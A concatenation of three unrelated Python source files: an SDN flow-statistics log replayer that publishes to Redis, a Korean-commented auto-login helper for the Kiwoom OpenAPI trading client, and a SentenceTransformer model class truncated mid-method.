import math
from collections import namedtuple, defaultdict
from threading import Thread
def pretty(d, indent=0):
for key, value in d.iteritems():
print '\t' * indent + str(key)
if isinstance(value, dict):
pretty(value, indent+1)
else:
print '\t' * (indent+1) + str(value)
name_mapping = {
"MAIN": "Main",
"MAIN_DFLT": "Main",
"MAIN_C_DFLT": "Main",
"MAIN_C1": "Main",
"MAIN_C2": "Main",
"OUTBOUND": "Outbound",
"OUTBOUND4IN": "Outbound",
"INBOUND": "InBound",
"INBOUND_DFLT": "InBound",
"INBOUND_B1": "InBound",
"INBOUND_C1": "InBound",
"INBOUND_C2": "InBound",
"ARP": "Main",
"ARPPXY": "ARP-Proxy",
"BGP": "BGP-Proxy",
"BGP_ARP": "BGP-Proxy",
"A1": "Router-A",
"A1_BGP": "Router-A",
"A1_ARP": "Router-A",
"VA1": "Router-A",
"VA1_ARP": "Router-A",
"B1": "Router-B",
"B1_BGP": "Router-B",
"B1_ARP": "Router-B",
"VB1": "Router-B",
"VB1_ARP": "Router-B",
"C1": "Router-C1",
"C1_BGP": "Router-C1",
"C1_ARP": "Router-C1",
"VC1": "Router-C1",
"VC1_ARP": "Router-C1",
"C2": "Router-C2",
"C2_BGP": "Router-C2",
"C2_ARP": "Router-C2",
"VC2": "Router-C2",
"VC2_ARP": "Router-C2",
"BAD": "bad",
}
traffic_mapping = {
"bgp": "bgp",
"arp": "arp",
"arp_v": "arp",
"default": "default",
"default_v": "default",
"b1_v": "default",
"c1_v": "default",
"c2_v": "default",
}
messages = {
"network_graph": {
"type": "difference",
"values": [("Outbound", "Main", []),
("Main", "Outbound", []),
("InBound", "Main", []),
("Main", "InBound", []),
("Main", "Router-A", []),
("Router-A", "Main", []),
("Main", "Router-B", []),
("Router-B", "Main", []),
("Main", "Router-C1", []),
("Router-C1", "Main", []),
("Main", "Router-C2", []),
("Router-C2", "Main", []),
("Main", "ARP-Proxy", ["arp"]),
("ARP-Proxy", "Main", ["arp"]),
("Main", "BGP-Proxy", ["bgp"]),
("BGP-Proxy", "Main", ["bgp"]),
("Outbound", "InBound", []),
("InBound", "Outbound", []),
],
},
"time_series": {
"type": "difference",
"values": [("Main", "Router-B", ["default"]),
("Main", "Router-C1", ["default"]),
("Main", "Router-C2", ["default"])],
},
}
class LogReplay(object):
def __init__(self, log_history, publisher, time_step=1, debug=False):
self.logger = logging.getLogger("LogReplay")
if debug:
self.logger.setLevel(logging.DEBUG)
self.log_history = log_history
self.time_step = time_step
self.publisher = publisher
self.run = False
def start(self):
self.run = True
while self.run:
start_time = time.time()
# data = self.log_history.next_values(self.time_step)
data = self.log_history.next_values()
# publish data
for d in data:
message = "|".join(d)
self.logger.debug(message)
self.publisher.publish(message)
sleep_time = self.time_step - time.time() + start_time
if sleep_time < 0:
sleep_time = 0
self.logger.debug("processing took longer than the time step")
self.logger.info("sleep for " + str(sleep_time) + "s")
time.sleep(sleep_time)
def stop(self):
self.run = False
class LogHistory(object):
def __init__(self, config, flows_dir, ports_dir, num_timesteps, debug=False):
self.logger = logging.getLogger("LogHistory")
if debug:
self.logger.setLevel(logging.DEBUG)
self.log_entry = namedtuple("LogEntry", "source destination type")
self.ports = defaultdict(list)
self.flows = defaultdict(list)
self.data = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
self.current_timestep = 0
self.total_timesteps = num_timesteps
self.parse_config(config)
self.parse_logs(num_timesteps, flows_dir, ports_dir)
self.info()
pretty(self.data)
def parse_config(self, config):
with open(config, 'r') as infile:
for line in infile:
# catch comment lines and empty lines
if line[0] == "#" or line.isspace():
continue
# build data structure which we can use to assign the logs to the correct edge and traffic type
data = line.split()
from_node = name_mapping[data[0]]
to_node = name_mapping[data[1]]
traffic_type = traffic_mapping[data[2]]
if "PORT" in data[3]:
# Format: PORT_<dpid>_<port>
dpid = int(data[3].split("_")[1])
port = int(data[3].split("_")[2])
self.ports[(dpid, port)].append(self.log_entry(from_node, to_node, traffic_type))
else:
# Format: <cookie>,<cookie>,...,<cookie>
cookies = [int(x) for x in data[3].split(",")]
for cookie in cookies:
self.flows[cookie].append(self.log_entry(from_node, to_node, traffic_type))
def parse_logs(self, num_timesteps, flows_dir, ports_dir):
for i in range(0, num_timesteps):
file_name = '{num:03d}'.format(num=i)
flow_file = flows_dir + "/" + file_name + ".flow"
self.parse_flow_log(flow_file, i)
port_file = ports_dir + "/" + file_name + ".ports"
self.parse_port_log(port_file, i)
# add missing values
self.clean_logs()
def parse_flow_log(self, file, step):
with open(file, 'r') as infile:
for line in infile:
data = line.split()
cookie = int(data[0])
byte_count = int(data[-1])
if cookie in self.flows:
entry_labels = self.flows[cookie]
for entry_label in entry_labels:
self.data[(entry_label.source, entry_label.destination)][entry_label.type][step] += byte_count
def parse_port_log(self, file, step):
with open(file, 'r') as infile:
for line in infile:
data = line.split()
dpid = int(''.join(c for c in data[1] if c.isdigit()))
port = int(data[3]) if data[3].isdigit() else -1
byte_count = int(data[-3])
if (dpid, port) in self.ports:
entry_labels = self.ports[(dpid, port)]
for entry_label in entry_labels:
self.data[(entry_label.source, entry_label.destination)][entry_label.type][step] += byte_count
def next_values(self, step=1):
data = list()
self.logger.info("Current Step: "+ str(self.current_timestep))
for message_type, settings in messages.iteritems():
label = str(message_type)
for message in settings["values"]:
source = str(message[0])
destination = str(message[1])
traffic_types = message[2]
for traffic_type, values in self.data[(source, destination)].iteritems():
if not traffic_types or traffic_type in traffic_types:
type = str(traffic_type)
if settings["type"] == "difference":
value = values[self.current_timestep + step] - values[self.current_timestep]
if value < 0:
self.logger.info("negative value (" + str(value) + ") for " +
source + "-" + destination + "-" + traffic_type +
" at step " + str(self.current_timestep + step))
value = 0
value = str(value)
elif settings["type"] == "total":
value = str(values[self.current_timestep + step])
data.append((label,
source,
destination,
type,
value))
self.current_timestep += step
return data
def clean_logs(self):
lengths = []
for edge, data in self.data.iteritems():
for type, values in data.iteritems():
lengths.append(len(values))
max_length = max(lengths)
for edge, data in self.data.iteritems():
for type, values in data.iteritems():
for i in range(0, max_length):
if i not in values:
values[i] = values[i - 1]
def info(self):
# data sources
info_message = "data sources: got " + str(len(self.flows)) + " flows and " + str(len(self.ports)) + " ports, "
debug_message = "data sources\n"
for key, value in self.flows.iteritems():
debug_message += str(key) + " " + str(value) + "\n"
for key, value in self.ports.iteritems():
debug_message += str(key) + " " + str(value) + "\n"
# edges in the graph
max_length = max([len(values) for values in self.data.values()])
info_message += "graph edges: got " + str(len(self.data)) + " edges with " + str(max_length) + " values each"
debug_message += "\ngraph edges\n"
for key, values in self.data.iteritems():
debug_message += str(key) + " with " + str(len(values)) + " values\n"
self.logger.info(info_message)
self.logger.debug(debug_message)
class Publisher(object):
def __init__(self, channel, address, port):
self.redis_client = redis.StrictRedis(host=address, port=port)
self.channel = channel
def publish(self, message):
self.redis_client.publish(self.channel, message)
def main(argv):
logging.basicConfig(level=logging.INFO)
log_history = LogHistory(argv.config, argv.flow_dir, argv.port_dir, int(argv.num_steps), debug=True)
channel = "sdx_stats"
address = "192.168.99.100"
port = 6379
db = 0
publisher = Publisher(channel, address, port)
log_replay = LogReplay(log_history, publisher, int(argv.timestep), debug=True)
# start replay
replay_thread = Thread(target=log_replay.start)
replay_thread.daemon = True
replay_thread.start()
while replay_thread.is_alive():
try:
replay_thread.join(1)
except KeyboardInterrupt:
log_replay.stop()
''' main '''
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('config', help='path of config file')
parser.add_argument('flow_dir', help='path of flow stats')
parser.add_argument('port_dir', help='path of port stats')
parser.add_argument('num_steps', help='number of steps')
parser.add_argument('timestep', help='time step')
args = parser.parse_args()
main(args)
|
autologin2.py | import time
import pythoncom
from manuallogin import *
from PyQt5 import QtWidgets
from PyQt5.QtCore import QTimer
from multiprocessing import Process
from PyQt5.QAxContainer import QAxWidget
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import OPENAPI_PATH
class Window(QtWidgets.QMainWindow):
app = QtWidgets.QApplication(sys.argv)
def __init__(self):
super().__init__()
self.bool_connected = False
self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1')
self.ocx.OnEventConnect.connect(self.OnEventConnect)
self.CommConnect()
def CommConnect(self):
self.ocx.dynamicCall('CommConnect()')
while not self.bool_connected:
pythoncom.PumpWaitingMessages()
def OnEventConnect(self, err_code):
if err_code == 0:
self.bool_connected = True
self.AutoLoginOn()
def AutoLoginOn(self):
print('\n 자동 로그인 설정 대기 중 ...\n')
QTimer.singleShot(5000, lambda: auto_on(2))
self.ocx.dynamicCall('KOA_Functions(QString, QString)', 'ShowAccountWindow', '')
print(' 자동 로그인 설정 완료\n')
print(' 자동 로그인 설정용 프로세스 종료 중 ...')
if __name__ == '__main__':
login_info = f'{OPENAPI_PATH}/system/Autologin.dat'
if os.path.isfile(login_info):
os.remove(f'{OPENAPI_PATH}/system/Autologin.dat')
print('\n 자동 로그인 설정 파일 삭제 완료\n')
Process(target=Window).start()
print(' 자동 로그인 설정용 프로세스 시작\n')
while find_window('Open API login') == 0:
print(' 로그인창 열림 대기 중 ...\n')
time.sleep(1)
print(' 아이디 및 패스워드 입력 대기 중 ...\n')
time.sleep(5)
manual_login(4)
print(' 아이디 및 패스워드 입력 완료\n')
|
SentenceTransformer.py | import json
import logging
import os
import shutil
import stat
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable, Optional
import requests
import numpy as np
from numpy import ndarray
import transformers
from huggingface_hub import HfApi, HfFolder, Repository, hf_hub_url, cached_download
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import trange
import math
import queue
import tempfile
from distutils.dir_util import copy_tree
from . import __MODEL_HUB_ORGANIZATION__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, fullname, snapshot_download
from .models import Transformer, Pooling, Dense
from .model_card_templates import ModelCardTemplate
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
Loads or create a SentenceTransformer model, that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
:param cache_folder: Path to store models
:param use_auth_token: HuggingFace authentication token to download private models.
"""
def __init__(self, model_name_or_path: Optional[str] = None,
modules: Optional[Iterable[nn.Module]] = None,
device: Optional[str] = None,
cache_folder: Optional[str] = None,
use_auth_token: Union[bool, str, None] = None
):
self._model_card_vars = {}
self._model_card_text = None
self._model_config = {}
if cache_folder is None:
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
#Old models that don't belong to any organization
basic_transformer_models = ['albert-base-v1', 'albert-base-v2', 'albert-large-v1', 'albert-large-v2', 'albert-xlarge-v1', 'albert-xlarge-v2', 'albert-xxlarge-v1', 'albert-xxlarge-v2', 'bert-base-cased-finetuned-mrpc', 'bert-base-cased', 'bert-base-chinese', 'bert-base-german-cased', 'bert-base-german-dbmdz-cased', 'bert-base-german-dbmdz-uncased', 'bert-base-multilingual-cased', 'bert-base-multilingual-uncased', 'bert-base-uncased', 'bert-large-cased-whole-word-masking-finetuned-squad', 'bert-large-cased-whole-word-masking', 'bert-large-cased', 'bert-large-uncased-whole-word-masking-finetuned-squad', 'bert-large-uncased-whole-word-masking', 'bert-large-uncased', 'camembert-base', 'ctrl', 'distilbert-base-cased-distilled-squad', 'distilbert-base-cased', 'distilbert-base-german-cased', 'distilbert-base-multilingual-cased', 'distilbert-base-uncased-distilled-squad', 'distilbert-base-uncased-finetuned-sst-2-english', 'distilbert-base-uncased', 'distilgpt2', 'distilroberta-base', 'gpt2-large', 'gpt2-medium', 'gpt2-xl', 'gpt2', 'openai-gpt', 'roberta-base-openai-detector', 'roberta-base', 'roberta-large-mnli', 'roberta-large-openai-detector', 'roberta-large', 't5-11b', 't5-3b', 't5-base', 't5-large', 't5-small', 'transfo-xl-wt103', 'xlm-clm-ende-1024', 'xlm-clm-enfr-1024', 'xlm-mlm-100-1280', 'xlm-mlm-17-1280', 'xlm-mlm-en-2048', 'xlm-mlm-ende-1024', 'xlm-mlm-enfr-1024', 'xlm-mlm-enro-1024', 'xlm-mlm-tlm-xnli15-1024', 'xlm-mlm-xnli15-1024', 'xlm-roberta-base', 'xlm-roberta-large-finetuned-conll02-dutch', 'xlm-roberta-large-finetuned-conll02-spanish', 'xlm-roberta-large-finetuned-conll03-english', 'xlm-roberta-large-finetuned-conll03-german', 'xlm-roberta-large', 'xlnet-base-cased', 'xlnet-large-cased']
if os.path.exists(model_name_or_path):
#Load from path
model_path = model_name_or_path
else:
#Not a path, load from hub
if '\\' in model_name_or_path or model_name_or_path.count('/') > 1:
raise ValueError("Path {} not found".format(model_name_or_path))
if '/' not in model_name_or_path and model_name_or_path.lower() not in basic_transformer_models:
# A model from sentence-transformers
model_name_or_path = __MODEL_HUB_ORGANIZATION__ + "/" + model_name_or_path
model_path = os.path.join(cache_folder, model_name_or_path.replace("/", "_"))
# Download from hub with caching
snapshot_download(model_name_or_path,
cache_dir=cache_folder,
library_name='sentence-transformers',
library_version=__version__,
ignore_files=['flax_model.msgpack', 'rust_model.ot', 'tf_model.h5'],
use_auth_token=use_auth_token)
if os.path.exists(os.path.join(model_path, 'modules.json')): #Load as SentenceTransformer model
modules = self._load_sbert_model(model_path)
else: #Load with AutoModel
modules = self._load_auto_model(model_path)
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
device: str = None,
normalize_embeddings: bool = False) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encode sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings. Set to None, to get all output values
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param device: Which torch.device to use for the computation
:param normalize_embeddings: If set to true, returned vectors will have length 1. In that case, the faster dot-product (util.dot_score) instead of cosine similarity can be used.
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
if convert_to_tensor:
convert_to_numpy = False
if output_value != 'sentence_embedding':
convert_to_tensor = False
convert_to_numpy = False
input_was_string = False
if isinstance(sentences, str) or not hasattr(sentences, '__len__'): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([-self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
for start_index in trange(0, len(sentences), batch_size, desc="Batches", disable=not show_progress_bar):
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
if output_value == 'token_embeddings':
embeddings = []
for token_emb, attention in zip(out_features[output_value], out_features['attention_mask']):
last_mask_id = len(attention)-1
while last_mask_id > 0 and attention[last_mask_id].item() == 0:
last_mask_id -= 1
embeddings.append(token_emb[0:last_mask_id+1])
elif output_value is None: #Return all outputs
embeddings = []
for sent_idx in range(len(out_features['sentence_embedding'])):
row = {name: out_features[name][sent_idx] for name in out_features}
embeddings.append(row)
else: #Sentence embeddings
embeddings = out_features[output_value]
embeddings = embeddings.detach()
if normalize_embeddings:
embeddings = torch.nn.functional.normalize(embeddings, p=2, dim=1)
# fixes for #522 and #487 to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
Starts multi process to process the encoding with several, independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
:param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, texts: Union[List[str], List[Dict], List[Tuple[str, str]]]):
"""
Tokenizes the texts
"""
return self._first_module().tokenize(texts)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path: str, model_name: Optional[str] = None, create_model_card: bool = True):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
:param path: Path on disc
:param model_name: Optional model name
:param create_model_card: If True, create a README.md with basic information about this model
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
modules_config = []
#Save some model info
if '__version__' not in self._model_config:
self._model_config['__version__'] = {
'sentence_transformers': __version__,
'transformers': transformers.__version__,
'pytorch': torch.__version__,
}
with open(os.path.join(path, 'config_sentence_transformers.json'), 'w') as fOut:
json.dump(self._model_config, fOut, indent=2)
#Save modules
for idx, name in enumerate(self._modules):
module = self._modules[name]
if idx == 0 and isinstance(module, Transformer): #Save transformer model in the main folder
model_path = path + "/"
else:
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
modules_config.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(modules_config, fOut, indent=2)
# Create model card
if create_model_card:
self._create_model_card(path, model_name)
def _create_model_card(self, path: str, model_name: Optional[str] = None):
"""
Create an automatic model and stores it in path
"""
if self._model_card_text is not None and len(self._model_card_text) > 0:
model_card = self._model_card_text
else:
tags = ModelCardTemplate.__TAGS__.copy()
model_card = ModelCardTemplate.__MODEL_CARD__
if len(self._modules) == 2 and isinstance(self._first_module(), Transformer) and isinstance(self._last_module(), Pooling) and self._last_module().get_pooling_mode_str() in ['cls', 'max', 'mean']:
pooling_module = self._last_module()
pooling_mode = pooling_module.get_pooling_mode_str()
model_card = model_card.replace("{USAGE_TRANSFORMERS_SECTION}", ModelCardTemplate.__USAGE_TRANSFORMERS__)
pooling_fct_name, pooling_fct = ModelCardTemplate.model_card_get_pooling_function(pooling_mode)
model_card = model_card.replace("{POOLING_FUNCTION}", pooling_fct).replace("{POOLING_FUNCTION_NAME}", pooling_fct_name).replace("{POOLING_MODE}", pooling_mode)
tags.append('transformers')
# Print full model
model_card = model_card.replace("{FULL_MODEL_STR}", str(self))
# Add tags
model_card = model_card.replace("{TAGS}", "\n".join(["- "+t for t in tags]))
# Add dim info
self._model_card_vars["{NUM_DIMENSIONS}"] = self.get_sentence_embedding_dimension()
# Replace vars we created while using the model
for name, value in self._model_card_vars.items():
model_card = model_card.replace(name, str(value))
# Replace remaining vars with default values
for name, value in ModelCardTemplate.__DEFAULT_VARS__.items():
model_card = model_card.replace(name, str(value))
if model_name is not None:
model_card = model_card.replace("{MODEL_NAME}", model_name.strip())
with open(os.path.join(path, "README.md"), "w", encoding='utf8') as fOut:
fOut.write(model_card.strip())
def save_to_hub(self,
repo_name: str,
organization: Optional[str] = None,
private: Optional[bool] = None,
commit_message: str = "Add new SentenceTransformer model.",
local_model_path: Optional[str] = None,
exist_ok: bool = False,
replace_model_card: bool = False):
"""
Uploads all elements of this Sentence Transformer to a new HuggingFace Hub repository.
:param repo_name: Repository name for your model in the Hub.
:param organization: Organization in which you want to push your model or tokenizer (you must be a member of this organization).
:param private: Set to true, for hosting a prive model
:param commit_message: Message to commit while pushing.
:param local_model_path: Path of the model locally. If set, this file path will be uploaded. Otherwise, the current model will be uploaded
:param exist_ok: If true, saving to an existing repository is OK. If false, saving only to a new repository is possible
:param replace_model_card: If true, replace an existing model card in the hub with the automatically created model card
:return: The url of the commit of your model in the given repository.
"""
token = HfFolder.get_token()
if token is None:
raise ValueError("You must login to the Hugging Face hub on this computer by typing `transformers-cli login`.")
if '/' in repo_name:
splits = repo_name.split('/', maxsplit=1)
if organization is None or organization == splits[0]:
organization = splits[0]
repo_name = splits[1]
else:
raise ValueError("You passed and invalid repository name: {}.".format(repo_name))
endpoint = "https://huggingface.co"
repo_url = HfApi(endpoint=endpoint).create_repo(
token,
repo_name,
organization=organization,
private=private,
repo_type=None,
exist_ok=exist_ok,
)
full_model_name = repo_url[len(endpoint)+1:].strip("/")
with tempfile.TemporaryDirectory() as tmp_dir:
# First create the repo (and clone its content if it's nonempty).
logger.info("Create repository and clone it if it exists")
repo = Repository(tmp_dir, clone_from=repo_url)
# If user provides local files, copy them.
if local_model_path:
copy_tree(local_model_path, tmp_dir)
else: # Else, save model directly into local repo.
create_model_card = replace_model_card or not os.path.exists(os.path.join(tmp_dir, 'README.md'))
self.save(tmp_dir, model_name=full_model_name, create_model_card=create_model_card)
#Find files larger 5M and track with git-lfs
large_files = []
for root, dirs, files in os.walk(tmp_dir):
for filename in files:
file_path = os.path.join(root, filename)
rel_path = os.path.relpath(file_path, tmp_dir)
if os.path.getsize(file_path) > (5 * 1024 * 1024):
large_files.append(rel_path)
if len(large_files) > 0:
logger.info("Track files with git lfs: {}".format(", ".join(large_files)))
repo.lfs_track(large_files)
logger.info("Push model to the hub. This might take a while")
push_return = repo.push_to_hub(commit_message=commit_message)
def on_rm_error(func, path, exc_info):
# path contains the path of the file that couldn't be removed
# let's just assume that it's read-only and unlink it.
try:
os.chmod(path, stat.S_IWRITE)
os.unlink(path)
except:
pass
# Remove .git folder. On Windows, the .git folder might be read-only and cannot be deleted
# Hence, try to set write permissions on error
try:
for f in os.listdir(tmp_dir):
shutil.rmtree(os.path.join(tmp_dir, f), onerror=on_rm_error)
except Exception as e:
logger.warning("Error when deleting temp folder: {}".format(str(e)))
pass
return push_return
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Help function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict): #{key: value} case
return len(next(iter(text.values())))
elif not hasattr(text, '__len__'): #Object has no len() method
return 1
elif len(text) == 0 or isinstance(text[0], int): #Empty string or list of ints
return len(text)
else:
return sum([len(t) for t in text]) #Sum of length of individual strings
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
show_progress_bar: bool = True,
checkpoint_path: str = None,
checkpoint_save_steps: int = 500,
checkpoint_save_total_limit: int = 0
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param show_progress_bar: If True, output a tqdm progress bar
:param checkpoint_path: Folder to save checkpoints during training
:param checkpoint_save_steps: Will save a checkpoint after so many steps
:param checkpoint_save_total_limit: Total number of checkpoints to store
"""
##Add info to model card
#info_loss_functions = "\n".join(["- {} with {} training examples".format(str(loss), len(dataloader)) for dataloader, loss in train_objectives])
info_loss_functions = []
for dataloader, loss in train_objectives:
info_loss_functions.extend(ModelCardTemplate.get_train_objective_info(dataloader, loss))
info_loss_functions = "\n\n".join([text for text in info_loss_functions])
info_fit_parameters = json.dumps({"evaluator": fullname(evaluator), "epochs": epochs, "steps_per_epoch": steps_per_epoch, "scheduler": scheduler, "warmup_steps": warmup_steps, "optimizer_class": str(optimizer_class), "optimizer_params": optimizer_params, "weight_decay": weight_decay, "evaluation_steps": evaluation_steps, "max_grad_norm": max_grad_norm }, indent=4, sort_keys=True)
self._model_card_text = None
